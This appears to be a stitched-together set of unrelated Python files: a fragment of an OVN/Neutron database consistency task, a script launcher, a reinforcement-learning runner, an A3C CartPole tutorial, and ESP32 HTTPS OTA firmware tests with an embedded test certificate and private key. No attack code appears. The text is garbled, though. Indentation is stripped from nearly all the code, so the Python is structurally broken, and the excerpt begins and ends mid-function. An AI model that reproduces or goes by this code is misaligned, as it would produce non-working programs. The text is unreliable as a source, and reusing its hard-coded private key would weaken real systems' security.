                    # If the resource exists and the revision number
                    # is equal in both databases, just bump the revision in
                    # the cache table.
db_rev.bump_revision(n_obj, row.resource_type)
def _fix_delete(self, row):
res_map = self._resources_func_map[row.resource_type]
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
db_rev.delete_revision(row.resource_uuid, row.resource_type)
else:
res_map['ovn_delete'](row.resource_uuid)
def _fix_create_update_subnet(self, row):
        # Get the latest version of the subnet in Neutron DB
admin_context = n_context.get_admin_context()
sn_db_obj = self._ovn_client._plugin.get_subnet(
admin_context, row.resource_uuid)
n_db_obj = self._ovn_client._plugin.get_network(
admin_context, sn_db_obj['network_id'])
if row.revision_number == ovn_const.INITIAL_REV_NUM:
self._ovn_client.create_subnet(sn_db_obj, n_db_obj)
else:
self._ovn_client.update_subnet(sn_db_obj, n_db_obj)
# The migration will run just once per neutron-server instance. If the lock
# is held by some other neutron-server instance in the cloud, we'll attempt
# to perform the migration every 10 seconds until completed.
@periodics.periodic(spacing=10, run_immediately=True)
def migrate_to_port_groups(self):
"""Perform the migration from Address Sets to Port Groups. """
# TODO(dalvarez): Remove this in U cycle when we're sure that all
# versions are running using Port Groups (and OVS >= 2.10).
# If Port Groups are not supported or we've already migrated, we don't
# need to attempt to migrate again.
if (not self._nb_idl.is_port_groups_supported() or
not self._nb_idl.get_address_sets()):
raise periodics.NeverAgain()
# Only the worker holding a valid lock within OVSDB will perform the
# migration.
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
nb_sync = ovn_db_sync.OvnNbSynchronizer(
self._ovn_client._plugin, self._nb_idl, self._ovn_client._sb_idl,
None, None)
nb_sync.migrate_to_port_groups(admin_context)
raise periodics.NeverAgain()
@periodics.periodic(spacing=DB_CONSISTENCY_CHECK_INTERVAL,
run_immediately=True)
def check_for_inconsistencies(self):
# Only the worker holding a valid lock within OVSDB will run
# this periodic
if not self.has_lock:
return
create_update_inconsistencies = db_maint.get_inconsistent_resources()
delete_inconsistencies = db_maint.get_deleted_resources()
if not any([create_update_inconsistencies, delete_inconsistencies]):
return
LOG.debug('Maintenance task: Synchronizing Neutron '
'and OVN databases')
self._sync_timer.restart()
# Fix the create/update resources inconsistencies
for row in create_update_inconsistencies:
try:
                # NOTE(lucasagomes): The way subnets are fixed is a bit
                # different from other resources. A subnet in OVN terms
                # is just a DHCP rule, but this rule only exists if the
                # subnet in Neutron has the "enable_dhcp" attribute set
                # to True. So, it's possible to have a consistent subnet
                # resource even when it does not exist in the OVN database.
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._fix_create_update_subnet(row)
else:
self._fix_create_update(row)
except Exception:
LOG.exception('Failed to fix resource %(res_uuid)s '
'(type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
# Fix the deleted resources inconsistencies
for row in delete_inconsistencies:
try:
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._ovn_client.delete_subnet(row.resource_uuid)
else:
self._fix_delete(row)
except Exception:
LOG.exception('Failed to fix deleted resource %(res_uuid)s '
'(type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
self._sync_timer.stop()
LOG.info('Maintenance task synchronization finished '
'(took %.2f seconds)', self._sync_timer.elapsed())
def _create_lrouter_port(self, port):
admin_context = n_context.get_admin_context()
router_id = port['device_id']
self._ovn_client._l3_plugin.add_router_interface(
admin_context, router_id, {'port_id': port['id']}, may_exist=True)
|
runme.py
|
import time
import os
import threading
def runPy(name):
os.system("start cmd /c python " + name)
authServer = threading.Thread(target=runPy, args=("server.py",), name="auth_server")
client = threading.Thread(target=runPy, args=("client.py",), name="client")
authServer.start()
client.start()
|
runner.py
|
import threading
from rlrunner.agents.base_agent import BaseAgent
from rlrunner.envs.base_env import BaseEnv
from rlrunner.stats.base_stat_saver import BaseStatSaver
from rlrunner.termination.base_termination_condition import BaseTerminationCondition
class Runner:
"""
    # This is the main class and the one you should instantiate.
    # Call methods on it to configure the runner (add agents, envs, set the
    # termination condition, etc.) and then call do_it() to start the run simulation.
    # The loop hierarchy is (Env -> Agent ->) Run -> Episode -> Step.
    # Note: progress printing should be implemented in the TC (termination condition),
    # the SS (StatSaver), or even render() in the Env.
"""
envs = []
agents = []
termination_cond = None
stat_saver = None
def __init__(self, number_of_runs=1, max_step_number=1000000):
self.number_of_runs = number_of_runs
self.max_step_number = max_step_number
def set_termination_condition(self, termination_cond):
if not isinstance(termination_cond, BaseTerminationCondition):
print("Error: TerminationCondition doesn't come from BaseTerminationCondition")
return
self.termination_cond = termination_cond
def set_stat_saver(self, stat_saver):
if not isinstance(stat_saver, BaseStatSaver):
print("Error: StatSaver doesn't come from BaseStatSaver")
return
self.stat_saver = stat_saver
def add_agent(self, agent):
if not isinstance(agent, BaseAgent):
print("Error: Agent doesn't come from BaseAgent")
return
self.agents.append(agent)
def remove_agent(self, agent):
self.agents.remove(agent)
def add_env(self, env):
if not isinstance(env, BaseEnv):
print("Error: Env doesn't come from BaseEnv")
return
self.envs.append(env)
def remove_env(self, env):
self.envs.remove(env)
def do_it(self, verbose=True):
x = threading.Thread(target=self.make_run, daemon=True, args=[verbose])
x.start()
return x
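    # The thread returned by do_it() lets the caller wait for the simulation to
    # finish, e.g. runner.do_it().join().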
def make_run(self, verbose=True):
if self.termination_cond is None:
print("Error: There is no TerminationCondition, you should set one")
return
for env in self.envs:
for agent in self.agents:
if self.stat_saver is not None and not self.stat_saver.should_i_run_agent(env, agent, self.number_of_runs):
continue
agent.setup(env.action_space, env.observation_space)
if verbose:
print("Starting Runs for agent %s in env %s" % (agent.name, env.name))
# loop of runs
for run_number in range(self.number_of_runs):
if verbose:
print("Doing Run nr", run_number)
# loop of episodes
episode_number = -1
active_run = True
while active_run:
episode_number += 1
is_exploit_episode = self.termination_cond.is_exploit_episode(episode_number)
obs = env.reset()
# loop of steps
for step_nr in range(self.max_step_number):
env.render()
action = agent.get_action(obs, is_exploit_episode)
result = env.step(action)
if len(result) == 4:
new_observation, reward, done, _ = result
else:
new_observation, reward, done = result
transition = (obs, action, reward, new_observation, done)
agent.learn(transition)
obs = new_observation
self.termination_cond.update_info(episode_number, transition)
if self.stat_saver is not None:
self.stat_saver.step_update(is_exploit_episode, env, agent,
(run_number, episode_number, step_nr), transition)
if done:
break
active_run = not self.termination_cond.check_termination(episode_number)
# 1. episode ends
# 2. run ends
agent.reset()
# 3. runs with agent end / time for new agent
# 4. agents with env end / time for new env
env.close()
# 5. all ends
print()
print("All done.")
|
A3C_discrete_action.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Asynchronous Advantage Actor Critic (A3C) with discrete action space, Reinforcement Learning.
The Cartpole example.
View more on my tutorial page: https://morvanzhou.github.io/tutorials/
Using:
tensorflow 1.8.0
gym 0.10.5
"""
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
import matplotlib.pyplot as plt
GAME = 'CartPole-v0'
OUTPUT_GRAPH = True
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_GLOBAL_EP = 1000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.9
ENTROPY_BETA = 0.001
LR_A = 0.001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.n
class ACNet(object):
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_params, self.c_params = self._build_net(scope)[-2:]
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.int32, [None, ], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
self.a_prob, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('a_loss'):
log_prob = tf.reduce_sum(tf.log(self.a_prob + 1e-5) * tf.one_hot(self.a_his, N_A, dtype=tf.float32), axis=1, keep_dims=True)
exp_v = log_prob * tf.stop_gradient(td)
entropy = -tf.reduce_sum(self.a_prob * tf.log(self.a_prob + 1e-5),
axis=1, keep_dims=True) # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
a_prob = tf.layers.dense(l_a, N_A, tf.nn.softmax, kernel_initializer=w_init, name='ap')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
return a_prob, v, a_params, c_params
def update_global(self, feed_dict): # run by a local
SESS.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s): # run by a local
prob_weights = SESS.run(self.a_prob, feed_dict={self.s: s[np.newaxis, :]})
action = np.random.choice(range(prob_weights.shape[1]),
p=prob_weights.ravel()) # select action w.r.t the actions prob
return action
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME).unwrapped
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
while True:
# if self.name == 'W_0':
# self.env.render()
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
if done: r = -5
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
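                    # buffer_v_target now holds the discounted returns
                    # R_t = r_t + GAMMA * R_{t+1}, bootstrapped from v_s_ at the
                    # truncation point; these are the critic targets below.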
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.array(buffer_a), np.vstack(buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
self.AC.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.99 * GLOBAL_RUNNING_R[-1] + 0.01 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
"| Ep_r: %i" % GLOBAL_RUNNING_R[-1],
)
GLOBAL_EP += 1
break
if __name__ == "__main__":
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
if OUTPUT_GRAPH:
if os.path.exists(LOG_DIR):
shutil.rmtree(LOG_DIR)
tf.summary.FileWriter(LOG_DIR, SESS.graph)
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
plt.xlabel('step')
plt.ylabel('Total moving reward')
plt.show()
|
example_test.py
|
import http.server
import os
import random
import re
import socket
import ssl
import struct
import subprocess
from threading import Thread
import ttfw_idf
from RangeHTTPServer import RangeRequestHandler
from tiny_test_fw import DUT, Utility
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n'\
'BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n'\
'aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n'\
'MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n'\
'ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n'\
'CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n'\
'nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n'\
'9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n'\
'w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n'\
'3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n'\
'lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n'\
'IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n'\
'DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n'\
'/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n'\
'lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n'\
'6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n'\
'fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n'\
'y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n'\
'hA==\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n'\
'uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n'\
'iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n'\
'ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n'\
'BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n'\
'1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n'\
'Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n'\
'02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n'\
'4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n'\
'SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n'\
'cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n'\
'8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n'\
'MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n'\
'6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n'\
'CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n'\
'ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n'\
'0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n'\
'5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n'\
'zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n'\
'V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n'\
'RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n'\
'nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n'\
'GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n'\
'9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n'\
'qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n'\
'muhfskWf4MABV0yTUaKcGg==\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
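    # connect() on a UDP socket sends no packets; it only selects a route, so
    # getsockname() reports the local interface IP that would be used to reach
    # 8.8.8.8.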
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def create_file(server_file, file_data):
with open(server_file, 'w+') as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, 'server_cert.pem')
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, 'server_key.pem')
create_file(key_file, server_key)
return server_file, key_file
def https_request_handler():
"""
Returns a request handler class that handles broken pipe exception
"""
class RequestHandler(RangeRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
RangeRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
requestHandler = https_request_handler()
httpd = http.server.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
chunked_server = subprocess.Popen(['openssl', 's_server', '-WWW', '-key', key_file, '-cert', server_file, '-port', str(server_port)])
return chunked_server
def redirect_handler_factory(url):
"""
Returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
print('Sending resp, URL: ' + url)
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RedirectHandler
def start_redirect_server(ota_image_dir, server_ip, server_port, redirection_port):
os.chdir(ota_image_dir)
server_file, key_file = get_ca_cert(ota_image_dir)
redirectHandler = redirect_handler_factory('https://' + server_ip + ':' + str(redirection_port) + '/advanced_https_ota.bin')
httpd = http.server.HTTPServer((server_ip, server_port), redirectHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example(env, extra_data):
"""
    This is a positive test case, which downloads the complete binary file multiple times.
    The number of iterations can be specified in the variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# Number of iterations to validate OTA
iterations = 3
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
        # The HTTPS server thread is a daemon thread, so it does not need to be shut down explicitly.
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example_truncated_bin(env, extra_data):
"""
    This test case validates the working of OTA when the binary file is truncated.
    The application should return with an error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated.bin'
    # Size of truncated file to be generated. This value can range from 288 bytes (image header size) to the size of the original binary file
    # truncated_bin_size is set to 64000 to reduce the time consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('Image validation failed, image is corrupted', timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example_truncated_header(env, extra_data):
"""
    This test case validates the working of OTA when the headers of the binary file are truncated.
    The application should return with an error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated_header.bin'
    # Size of truncated file to be generated. This value should be less than 288 bytes (image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('advanced_https_ota_example: esp_https_ota_read_img_desc failed', timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example_random(env, extra_data):
"""
    This test case validates the working of OTA when the binary file contains random data.
    Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Random binary file to be generated
random_bin_name = 'random.bin'
    # Size of random binary file. 32000 is chosen to reduce the time required to run the test case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, 'wb+')
    # The first byte of the binary file is always set to zero. If the first byte were generated randomly,
    # it could come out as 0xE9, which would cause the test case to fail.
fo.write(struct.pack('B', 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name)
dut1.expect('esp_ota_ops: OTA image has invalid magic byte', timeout=10)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_advanced_https_ota_example_chunked(env, extra_data):
"""
    This is a positive test case, which downloads the complete binary file multiple times.
    The number of iterations can be specified in the variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
